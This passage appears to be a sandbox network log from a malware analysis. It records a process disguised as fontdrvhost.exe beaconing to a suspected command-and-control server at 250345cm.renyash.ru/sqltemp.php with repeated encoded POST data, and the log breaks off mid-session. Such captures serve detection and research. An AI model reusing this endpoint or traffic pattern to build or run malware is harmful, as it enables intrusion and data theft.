Jan 1, 2025 14:52:14.626246929 CET	1012	OUT	Data Raw: 53 57 5a 54 54 59 54 5c 58 56 52 59 56 5f 59 51 5b 5b 54 51 55 55 50 5d 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SWZTTYT\XVRYV_YQ[[TQUUP]Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.$#-38894=(^<=Z7[;91 -:&Y.,Y-9
Jan 1, 2025 14:52:14.722331047 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:14.988084078 CET	807	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B2XL3WyUNXT7zbUaeY4ID15UEC5wP%2BabqUXdZmhBg77ggpxMw4z3hB%2Bs9CgV29KlSFuZaqV%2BvFdnh1DyYM2s5TA0Rt89otTZyPvJ3LA8M3cciwEDPH5pcBQr5J7oasAbqf8OMGU7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fd1bb86943fe-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=8449&min_rtt=2417&rtt_var=12971&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=28810&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49759	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:15.113224030 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 1, 2025 14:52:15.464382887 CET	1012	OUT	Data Raw: 56 51 5f 5d 51 5d 54 51 58 56 52 59 56 5c 59 51 5b 52 54 5b 55 59 50 55 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VQ_]Q]TQXVRYV\YQ[RT[UYPUZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.X'/-]#,.$#B.).7(9'>$!2<;5D%<#V.&Y.,Y-5
Jan 1, 2025 14:52:15.552138090 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:15.820786953 CET	811	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v8qHZq%2BLW6DNhPLCb7Lrw%2B7A1xr51lUCaiX8EGkR4zp9TSV0%2BEKMugipV%2BUappoogGZ7nAPbwMdmIjzUFZdJscBx6wekF3TpNOR%2FCiOjS2zQ6RzrtLB%2FxQSDRvyzckeVJVFaNY8c"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fd20eaecc47c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2028&min_rtt=1506&rtt_var=1609&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=256906&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49760	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:15.949764967 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 1, 2025 14:52:16.308116913 CET	1012	OUT	Data Raw: 53 50 5f 5d 54 50 51 57 58 56 52 59 56 5a 59 56 5b 5f 54 5a 55 54 50 5e 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SP_]TPQWXVRYVZYV[_TZUTP^Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.3<5Z7,=Y%.?E,)7((7>4Z!2++)C27S.&Y.,Y--
Jan 1, 2025 14:52:16.413692951 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:16.668965101 CET	806	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I8LTAy1Auw5EhmSb2Gl%2Bv9R0UmUujL0Aqf%2Fwut6I1Jm8UcturesJETk8ktfe%2F66a1xOPEzEJEtyIzj0cu7l70yTmjSoABwF2QIHZvJsjkwrD50j0B%2FbA53ebprfbT5ozimZYy9Hp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fd264c527c78-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3789&min_rtt=1924&rtt_var=4452&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=86667&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49761	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:16.792577028 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 1, 2025 14:52:17.152208090 CET	1012	OUT	Data Raw: 53 57 5f 56 54 50 54 54 58 56 52 59 56 5e 59 54 5b 5b 54 59 55 5c 50 5f 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SW_VTPTTXVRYV^YT[[TYU\P_Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.^0Y:#-\$?;)=4=3?98*=+ /\+$/'R,:&Y.,Y-
Jan 1, 2025 14:52:17.235599995 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:17.486134052 CET	803	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UbYR9Yl%2BjQY5b3tDaJdTKmQC1LPkhnGF9VyEeDhZ2XmTSVCPzRPGYF4njzDr%2FjNnde6bycgcDf66E1IrYyjdO7QHUcRDUaoCUsOmO5cG36cf498ni2pmJ8vODFgLtxVIsPF1IXFy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fd2b7a6bde93-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2501&min_rtt=1441&rtt_var=2661&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=147118&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49762	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:17.613313913 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 1, 2025 14:52:17.964365005 CET	1012	OUT	Data Raw: 56 54 5a 56 54 50 51 50 58 56 52 59 56 5c 59 54 5b 5e 54 5b 55 54 50 58 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VTZVTPQPXVRYV\YT[^T[UTPXZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.05\ 3X781!-Y*9>,#1/X?B%<$-&Y.,Y-5
Jan 1, 2025 14:52:18.058342934 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:18.313347101 CET	806	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7YmZiKW6%2FSvQbdErUkDIdqf8OcfECdAUznFJ2sC7N6TRM0lC3g%2BBVrlWhVlNR3IM%2F6WXTYmNGf%2FWsVIKeFnzj67Wsgv6qNZtSp0EoBk1SNf5O6laX4PpAJuRtcuxxOaN5c0XbjQR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fd309b744234-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4713&min_rtt=1874&rtt_var=6382&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=59371&cwnd=171&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49763	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:18.432210922 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 1, 2025 14:52:18.777070999 CET	1012	OUT	Data Raw: 56 5f 5f 51 54 50 54 51 58 56 52 59 56 51 59 56 5b 5c 54 5f 55 5e 50 5e 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: V__QTPTQXVRYVQYV[\T_U^P^Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S._$Z7:3/::!=(<#V=>; !7Y?6$/.&Y.,Y-
Jan 1, 2025 14:52:18.876559019 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:19.147226095 CET	800	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FdBnwkwBTEqkwHb9OoBsDmZYdzOQrDGNdcS90TvpTMxtzh3Vfzlc7CixI8Iabyw1eCFzLd5KxPwOTfEffF1CnwG35W7HfImZ343Vm1PAj8zwjg%2FIXypakf8DiwG9D4Pnlu9dy0zF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fd35bf0643f4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3837&min_rtt=1730&rtt_var=4864&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=78528&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49764	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:19.563011885 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1852 Expect: 100-continue
Jan 1, 2025 14:52:19.917488098 CET	1852	OUT	Data Raw: 53 57 5a 50 54 5e 54 5c 58 56 52 59 56 5b 59 55 5b 5f 54 5b 55 5b 50 5f 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SWZPT^T\XVRYV[YU[_T[U[P_Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.&?5Y 9%>E82!.;<9 =>+7(?=@%+U:&Y.,Y-)
Jan 1, 2025 14:52:20.007232904 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:20.312602997 CET	956	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FZODa1hYGX5YpNfCp8qhG2h18S%2B4dNUlxFFkJrOF9zJ9hu7VN6vOiv3NNHoaabu25LlWzvbxccvY7NOedwt%2BOQrLbxo53oz9e0MiFLQS%2F80ewVUN%2BykEtssknJWYpVjGPYobhefN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fd3cc92e0caa-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1911&min_rtt=1600&rtt_var=1222&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2147&delivery_rate=356880&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1f 25 1d 3d 03 26 1c 26 0b 34 5a 3f 2d 06 0c 27 2e 31 03 2b 06 3a 5f 30 3d 27 10 29 29 23 58 21 2c 0c 01 31 3b 3c 13 34 3d 09 13 24 0e 2b 59 05 1c 20 06 23 3c 33 01 29 3e 27 16 32 06 2d 59 30 3d 38 16 2b 38 2c 54 34 38 3b 12 24 3e 28 11 2a 14 33 0a 27 12 30 06 2e 11 0c 0e 24 00 2c 54 00 11 26 57 33 31 16 58 37 24 33 01 21 1f 35 10 25 1a 22 15 32 3c 2f 53 23 39 3e 14 26 0c 3f 10 35 0a 2e 5e 26 28 39 5b 23 03 33 54 29 2e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%=&&4Z?-'.1+:_0='))#X!,1;<4=$+Y #<3)>'2-Y0=8+8,T48;$>(*3'0.$,T&W31X7$3!5%"2</S#9>&?5.^&(9[#3T).%S -H?WS0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49765	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:19.577934027 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1008 Expect: 100-continue
Jan 1, 2025 14:52:19.933250904 CET	1008	OUT	Data Raw: 56 5f 5f 56 54 58 51 52 58 56 52 59 56 59 59 51 5b 5b 54 5c 55 5e 50 54 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: V__VTXQRXVRYVYYQ[[T\U^PTZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-3/""?:3'/1W#0+:'*. #"(+>2'V,:&Y.,Y-9
Jan 1, 2025 14:52:20.030523062 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:20.299685955 CET	808	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fK2ykM28Ch4Wj%2F2PfOb1AVTr3ecKYuR7MO%2BvrMRCcsexC31SFflD3%2B6lG%2FOzuPCvbEXNetymX2Fx237URURazreJcDaSWV9cFng61NkSXQ8Hj4zDjkuBVIhJ5bNl61P%2BVTxoJpnD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fd3ce8eb422e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4393&min_rtt=1762&rtt_var=5922&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1303&delivery_rate=64007&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49766	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:20.433525085 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 1, 2025 14:52:20.792599916 CET	1012	OUT	Data Raw: 53 53 5a 54 51 5d 54 5d 58 56 52 59 56 51 59 57 5b 5e 54 58 55 54 50 5e 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SSZTQ]T]XVRYVQYW[^TXUTP^Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.0%X =\$'D.9-!-+(_?V(>87'Z+*$/V9:&Y.,Y-
Jan 1, 2025 14:52:20.898731947 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:21.162894964 CET	802	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w88tp0uzcQ8eaJCHP9Wcm6UJ0Cf1M5F02tY4OxYKlGZg6nHeSsJHl9AjGoqLFyoxdhlpLFmVtsu%2FshewN73M%2BRt6onTWMNuENe21LpAip9inym0DTiGVw3qHlyXgTXh6tWeInVcs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fd425eac7cb1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3881&min_rtt=2047&rtt_var=4437&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=87289&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49767	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:21.292273045 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 1, 2025 14:52:21.636364937 CET	1012	OUT	Data Raw: 56 51 5a 50 54 5a 51 57 58 56 52 59 56 50 59 5f 5b 5f 54 5c 55 5a 50 5a 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VQZPTZQWXVRYVPY_[_T\UZPZZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.['/54Y&'/:27$^+)?W=< !+\+92?8-:&Y.,Y-
Jan 1, 2025 14:52:21.745121002 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:22.003360033 CET	806	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jxh16YFb%2BJWBDO1Me6iS2dM1%2FX2svQSEYNvsN6ma4Gnzt0tvM0NazU58Fh3TQ%2BegQE8qlgbCWHaE3C79V8xdONzrRlGycisbPxXOcBsmHXUKasyjDhfd6x2dtFUe8fA%2FbU9NZ3R1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fd479aee43c4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2916&min_rtt=1710&rtt_var=3053&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=128532&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49768	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:22.297456980 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
